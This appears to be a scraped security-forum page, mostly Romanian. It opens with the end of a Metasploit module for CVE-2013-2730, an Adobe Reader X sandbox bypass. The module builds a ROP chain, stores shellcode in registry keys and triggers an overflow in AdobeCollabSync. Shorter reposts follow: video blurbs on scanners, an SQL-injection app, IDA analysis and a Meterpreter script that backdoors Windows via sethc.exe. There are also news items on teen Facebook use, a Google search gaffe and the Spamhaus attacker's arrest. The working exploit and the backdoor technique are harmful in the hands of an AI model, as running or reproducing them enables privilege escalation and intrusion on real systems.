privileges from a Low Integrity AcroRd32.exe process. This module has been tested successfully on Adobe Reader X 10.1.4 over Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => [ 'Felipe Andres Manzano', # Vulnerability discovery and PoC 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-2730' ], [ 'OSVDB', '93355' ], [ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ] ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => 'meterpreter', 'Payload' => { 'Space' => 12288, 'DisableNops' => true }, 'Targets' => [ [ 'Adobe Reader X 10.1.4 / Windows 7 SP1', { 'AdobeCollabSyncTrigger' => 0x18fa0, 'AdobeCollabSyncTriggerSignature' => "\x56\x68\xBC\x00\x00\x00\xE8\xF5\xFD\xFF\xFF" } ], ], 'DefaultTarget' => 0, 'DisclosureDate'=> 'May 14 2013' })) end def on_new_session print_status("Deleting Malicious Registry Keys...") if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode") print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode by yourself") end if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB") print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB by yourself") end print_status("Cleanup finished") end # Test the process integrity level by trying to create a directory on the TEMP folder # Access should be granted with Medium Integrity Level # Access should be denied with Low Integrity Level # Usint this solution atm because I'm experiencing problems with railgun when trying # use GetTokenInformation def low_integrity_level? tmp_dir = expand_path("%TEMP%") cd(tmp_dir) new_dir = "#{rand_text_alpha(5)}" begin session.shell_command_token("mkdir #{new_dir}") rescue return true end if directory?(new_dir) session.shell_command_token("rmdir #{new_dir}") return false else return true end end def check_trigger signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length) if signature == target['AdobeCollabSyncTriggerSignature'] return true end return false end def collect_addresses # find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe @addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'] vprint_good("AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}") # find kernel32.dll kernel32 = session.railgun.kernel32.GetModuleHandleA("kernel32.dll") @addresses['kernel32.dll'] = kernel32["return"] if @addresses['kernel32.dll'] == 0 fail_with(Exploit::Failure::Unknown, "Unable to find kernel32.dll") end vprint_good("kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}") # find kernel32.dll methods virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "VirtualAlloc") @addresses['VirtualAlloc'] = virtual_alloc["return"] if @addresses['VirtualAlloc'] == 0 fail_with(Exploit::Failure::Unknown, "Unable to find VirtualAlloc") end vprint_good("VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}") reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "RegGetValueA") @addresses['RegGetValueA'] = reg_get_value["return"] if @addresses['RegGetValueA'] == 0 fail_with(Exploit::Failure::Unknown, "Unable to find RegGetValueA") end vprint_good("RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}") # find ntdll.dll ntdll = session.railgun.kernel32.GetModuleHandleA("ntdll.dll") @addresses['ntdll.dll'] = ntdll["return"] if @addresses['ntdll.dll'] == 0 fail_with(Exploit::Failure::Unknown, "Unable to find ntdll.dll") end vprint_good("ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}") end # Search a gadget identified by pattern on the process memory def search_gadget(base, offset_start, offset_end, pattern) mem = base + offset_start length = offset_end - offset_start mem_contents = session.railgun.memread(mem, length) return mem_contents.index(pattern) end # Search for gadgets on ntdll.dll def search_gadgets ntdll_text_base = 0x10000 search_length = 0xd6000 @gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x89\x0f\xc3") if @gadgets['mov [edi], ecx # ret'].nil? fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'mov [edi], ecx # ret'") end @gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll'] @gadgets['mov [edi], ecx # ret'] += ntdll_text_base vprint_good("Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}") @gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2 vprint_good("Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}") @gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x5f\xc3") if @gadgets['pop edi # ret'].nil? fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop edi # ret'") end @gadgets['pop edi # ret'] += @addresses['ntdll.dll'] @gadgets['pop edi # ret'] += ntdll_text_base vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}") @gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x59\xc3") if @gadgets['pop ecx # ret'].nil? fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop ecx # ret'") end @gadgets['pop ecx # ret'] += @addresses['ntdll.dll'] @gadgets['pop ecx # ret'] += ntdll_text_base vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}") end def store(buf, data, address) i = 0 while (i < data.length) buf << [@gadgets['pop edi # ret']].pack("V") buf << [address + i].pack("V") # edi buf << [@gadgets['pop ecx # ret']].pack("V") buf << data[i, 4].ljust(4,"\x00") # ecx buf << [@gadgets['mov [edi], ecx # ret']].pack("V") i = i + 4 end return i end def create_rop_chain mem = 0x0c0c0c0c buf = [0x58000000 + 1].pack("V") buf << [0x58000000 + 2].pack("V") buf << [0].pack("V") buf << [0x58000000 + 4].pack("V") buf << [0x58000000 + 5].pack("V") buf << [0x58000000 + 6].pack("V") buf << [0x58000000 + 7].pack("V") buf << [@gadgets['ret']].pack("V") buf << rand_text(8) # Allocate Memory To store the shellcode and the necessary data to read the # shellcode stored in the registry buf << [@addresses['VirtualAlloc']].pack("V") buf << [@gadgets['ret']].pack("V") buf << [mem].pack("V") # lpAddress buf << [0x00010000].pack("V") # SIZE_T dwSize buf << [0x00003000].pack("V") # DWORD flAllocationType buf << [0x00000040].pack("V") # flProtect # Put in the allocated memory the necessary data in order to read the # shellcode stored in the registry # 1) The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00" reg_key_length = store(buf, reg_key, mem) # 2) The reg entry: shellcode value_key = "shellcode\x00" store(buf, value_key, mem + reg_key_length) # 3) The output buffer size: 0x3000 size_buffer = 0x3000 buf << [@gadgets['pop edi # ret']].pack("V") buf << [mem + 0x50].pack("V") # edi buf << [@gadgets['pop ecx # ret']].pack("V") buf << [size_buffer].pack("V") # ecx buf << [@gadgets['mov [edi], ecx # ret']].pack("V") # Copy the shellcode from the the registry to the # memory allocated with executable permissions and # ret into there buf << [@addresses['RegGetValueA']].pack("V") buf << [mem + 0x1000].pack("V") # ret to shellcode buf << [0x80000001].pack("V") # hkey => HKEY_CURRENT_USER buf << [mem].pack("V") # lpSubKey buf << [mem + 0x3c].pack("V") # lpValue buf << [0x0000FFFF].pack("V") # dwFlags => RRF_RT_ANY buf << [0].pack("V") # pdwType buf << [mem + 0x1000].pack("V") # pvData buf << [mem + 0x50].pack("V") # pcbData end # Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry def store_data_registry(buf) vprint_status("Creating the Registry Key to store the shellcode...") if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode") vprint_good("Registry Key created") else fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Key to store the shellcode") end vprint_status("Storing the shellcode in the Registry...") if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "shellcode", payload.encoded, "REG_BINARY") vprint_good("Shellcode stored") else fail_with(Exploit::Failure::Unknown, "Failed to store shellcode in the Registry") end # Create the Malicious registry entry in order to exploit.... vprint_status("Creating the Registry Key to trigger the Overflow...") if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB") vprint_good("Registry Key created") else fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Entry to trigger the Overflow") end vprint_status("Storing the trigger in the Registry...") if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "bDeleteDB", buf, "REG_BINARY") vprint_good("Trigger stored") else fail_with(Exploit::Failure::Unknown, "Failed to store the trigger in the Registry") end end def trigger_overflow vprint_status("Creating the thread to trigger the Overflow on AdobeCollabSync.exe...") # Create a thread in order to execute the necessary code to launch AdobeCollabSync ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, "CREATE_SUSPENDED", nil) if ret['return'] < 1 print_error("Unable to CreateThread") return end hthread = ret['return'] vprint_status("Resuming the Thread...") # Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability! ret = client.railgun.kernel32.ResumeThread(hthread) if ret['return'] < 1 fail_with(Exploit::Failure::Unknown, "Unable to ResumeThread") end end def check @addresses = {} acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe") @addresses['AcroRd32.exe'] = acrord32["return"] if @addresses['AcroRd32.exe'] == 0 return Msf::Exploit::CheckCode::Unknown elsif check_trigger return Msf::Exploit::CheckCode::Vulnerable else return Msf::Exploit::CheckCode::Detected end end def exploit @addresses = {} @gadgets = {} print_status("Verifying we're in the correct target process...") acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe") @addresses['AcroRd32.exe'] = acrord32["return"] if @addresses['AcroRd32.exe'] == 0 fail_with(Exploit::Failure::NoTarget, "AcroRd32.exe process not found") end vprint_good("AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}") print_status("Checking the AcroRd32.exe image...") if not check_trigger fail_with(Exploit::Failure::NoTarget, "Please check the target, the AcroRd32.exe process doesn't match with the target") end print_status("Checking the Process Integrity Level...") if not low_integrity_level? fail_with(Exploit::Failure::NoTarget, "Looks like you don't need this Exploit since you're already enjoying Medium Level") end print_status("Collecting necessary addresses for exploit...") collect_addresses print_status("Searching the gadgets needed to build the ROP chain...") search_gadgets print_good("Gadgets collected...") print_status("Building the ROP chain...") buf = create_rop_chain print_good("ROP chain ready...") print_status("Storing the shellcode and the trigger in the Registry...") store_data_registry(buf) print_status("Executing AdobeCollabSync.exe...") trigger_overflow end end Sursa: AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass
-
Description: In this video you will learn how to use iScanner tool for removing website malware,Web pages viruses and malicious codes. About iScanner : - iScanner is a free open source tool lets you detect and remove malicious codes and web page malwares from your website easily and automatically. iScanner will not only show you the infected files in your server but it's also able to clean these files by removing the malware code ONLY from the infected files. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Iscanner - Remove Website Malware
-
http://www.youtube.com/watch?feature=player_embedded&v=1GHBKo4uXWY Description: Like: www.facebook.com/www.kali.org Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Kali Linux - How to use wapiti web scanner - YouTube Sursa: Kali Linux - How To Use Wapiti Web Scanner
-
http://www.youtube.com/watch?feature=player_embedded&v=HGePlEqLMeo Description: DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks. DroidSQLi supports the following injection techniques: - Time based injection - Blind injection - Error based injection - Normal injection Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Android App :- Droidsqli - YouTube Sursa: Android App :- Droidsqli
-
Noi cercetari arata ca adolescentii sunt mai atrasi de Twitter, numarul utilizatorilor din randul lor dublandu-se in ultima vreme. Prietenii agasanti dar si prietenii curiosi ii fac pe tineri sa se indeparteze de Facebook si sa aleaga Twitter. Investitorii in marea "inventie" a lui Mark Zuckerberg se arata ingrijorati de aceasta migratie, singura solutie fiind atragerea adolescentilor prin produse speciale si, pe cat posibil, ieftine sau gratuite. Un tanar are in medie 300 de prieteni, isi tine profilul ascuns de ceilalti utilizatori (printre care se pot afla si parintii). Numarul celor care au cont pe Facebook este neschimbat fata de anul trecut dar asta nu inseamna ca si utilizeaza reteaua de socializare ca in anii trecuti, preferate fiind acum Tiwtter, Instagram si Tumblr. Cu toate ca "se ascund" de Facebook, tinerii au postat mai multe informatii despre ei in ultimii ani. Pe langa fotografii, adolescentii au oferit date despre scoala la care studiaza, orasul, adresa de mail dar si numarul de telefon. Sursa: Numarul tinerilor care utilizeaza Facebook este in scadere
-
Description: In this video Firdaus Sahin talking about Advanced Static Analysis Using IDA pro. Actually, Static program analysis is the perform an analysis process without actually executing the programs, In most cases we are doing Dynamic analysis - running that piece of malware and checking our computer behavior and capturing the traffic but this process is totally different. IDA-Pro : - IDA is a Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger that offers so many features it is hard to describe them all. Just grab an evaluation version if you want a test drive. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Static Analysis With Ida Pro
-
Description: This Meterpreter script basically replaces sethc.exe or utilman.exe to a cmd shell. Watch the video and you will understand how this becomes handy. Big Thanks to Sec tube Mega Primers for inspiring me https://github.com/Un0wnX/swaparoo Un0wn_X Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Swaparoo Meterpreter Script To Backdoor Any Version Of Windows
-
Stupoare maxima pentru un om care a cautat un cuvant controversat pe Google. Ce rezultate i-a afisat motorul Google are tot soiul de algoritmi inteligenti prin care sa ne intuiasca gandurile De data aceasta, insa, motorul de cautare a dat-o in bara. Cautarile pe Google intorc rezultatele asteptate de cele mai multe ori. Insa exista si exceptii hilare. BuzzFeed a descoperit ca atunci cand cauti "gayest trends" sau "gayest disney movies" (cele mai gay tendinte sau ele mai gay filme disney), motorul de cautare intoarce rezultate precum "cele mai proaste 10 tentinte ale modei masculine din acest deceniu" sau "cele mai proaste 8 filme Disney din istorie". Cu alte cuvinte asociaza "gayest" cu "worst", adica cel mai gay cu cel mai prost, gafa care ar putea ofensa anumite persoane. Aceasta nu este, insa, decat o eroare pe care cei de la Google trebuie sa o rezolve. Ei au declarat, pentru NewsFeed ca: "Rezultatele afisate de Google, inclusiv atunci cand un termen e considerat sinonim pentru un altul, sunt o reflectie a continutului de pe Internet si a modului in care oamenii fac cautari. Aceste rezultate sunt determinate de algoritmi si nu avem control manual asupra acestui proces, dar mereu incercam sa vedem cum ne putem imbunatatii algoritmii". Sursa: Stupoare maxima pentru un om care a cautat un cuvant controversat pe Google. Ce rezultate i-a afisat motorul - www.yoda.ro
-
Sven Olaf Kamphuis, acuzat de mai multe faradelegi in domeniul informatic, a fost atat de "neindemanatic" incat si-a pus numele pe cutia postala a resedintei sale. In ziua in care Sven Olaf Kamphuis si-a parcat Mercedesul portocaliu cu numere de Germania in fata stabilimentului Bar Javis din Granollers, Catalunia, Spania, fiul patronului barului a stiut cine este. Nu se intampla prea multe in oraselul care se afla la 30 de km de Barcelona asa ca prinderea lui Olaf a fost doar o chestiune de timp. Sven Olaf Kamphuis a fost purtatorul de cuvant al olandezilor de la Cyberbunker, o companie olandeza alaturi de car Spamhaus, un grup care lupta impotriva emailurilor nedorite, au dat peste cap internetul in cel mai mare atac cibernetic din istorie la finalul lunii martie a acestui an. Grupul cu sedii in Londra si Geneva a trecut firma din Olanda pe lista neagra a distribuitorilor de spam-uri, miscarea fiind urmata de un atac fara egal: nu mai putin de 300 de milioane de biti pe secunda de date lovind serverele Spamhaus. Kamphuis va aparea in fata unui complet de judecata olandez la Rotterdam, la sfarsitul acestei saptamani. Sursa: Un olandez cautat pentru ca aproape a distrus internetul a fost gasit in Spania - www.yoda.ro